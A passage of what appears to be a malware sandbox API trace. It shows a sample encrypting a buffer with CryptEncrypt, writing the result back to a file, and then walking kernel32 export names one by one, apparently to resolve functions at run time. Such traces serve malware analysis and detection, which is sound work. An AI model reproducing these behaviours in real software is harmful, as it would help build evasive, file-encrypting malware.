0x8b0000 [0185.717] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.717] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.717] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.717] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.717] CloseHandle (hObject=0x268) returned 1 [0185.718] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.718] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.718] CloseHandle (hObject=0x0) returned 0 [0185.718] CloseHandle (hObject=0x264) returned 1 [0185.719] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.719] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.719] GetTickCount () returned 0x1135aae [0185.719] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.719] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.719] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.719] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.720] lstrlenA (lpString="kernel32.dll") returned 12 [0185.720] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.720] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.720] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.720] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.720] lstrlenA (lpString="ADDATOMA") returned 8 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.720] lstrlenA (lpString="ADDATOMW") returned 8 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.720] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.720] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.720] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.720] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.720] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.720] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.720] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.720] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.720] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.721] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.721] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.721] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.721] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.721] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.721] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.721] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.721] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.721] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.721] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.721] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.721] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.721] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.721] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.721] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.721] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.721] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.721] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.721] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.721] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.722] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.722] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.722] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.722] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.722] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.722] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.722] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.722] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.722] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.722] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.722] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.722] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.722] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.722] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.722] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.722] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.722] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.722] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.722] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.722] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.723] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.723] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.723] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.723] lstrlenA (lpString="BEEP") returned 4 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.723] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.723] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.723] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.723] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.723] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.723] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.723] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.723] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.723] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.723] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.723] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.723] lstrlenA (lpString="CANCELIO") returned 8 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.723] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.723] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.723] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.723] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.724] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.724] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.724] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.724] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.724] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.724] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.724] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.724] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.724] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.724] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.724] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.724] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.724] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.724] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.724] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.724] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.724] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.724] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.724] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.724] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.725] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.725] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.725] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.725] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.725] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.725] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.725] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.725] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.725] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.725] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.725] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.725] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.725] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.725] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.725] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.725] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.725] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.725] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.725] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.725] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.725] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.726] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.726] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.726] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.726] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.726] lstrlenA (lpString="COPYFILEA") returned 9 [0185.726] lstrcpyA 